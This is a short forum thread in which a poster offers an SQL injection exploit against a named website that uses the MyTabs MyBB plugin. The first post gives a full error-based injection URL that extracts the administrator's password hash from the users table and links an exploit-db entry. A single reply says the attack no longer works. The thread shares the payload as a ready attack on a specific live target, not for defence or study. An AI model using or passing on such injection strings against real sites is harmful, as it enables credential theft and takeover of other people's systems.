Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
NerdChat.net
#1
I haven't actually tested this, because IE blocks me from doing the exlpoit, but the forum uses MyTabs, which is a MyBB plugin with a huge SQL vulerability.

Exlpoit:

http://nerdchat.net/index.php?tab=1' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -

(this grabs the administrator's password hash)

A full explanation of the exploit: http://www.exploit-db.com/exploits/17595/
#2
no longer working,

/Closed


Forum Jump:


Users browsing this thread: 1 Guest(s)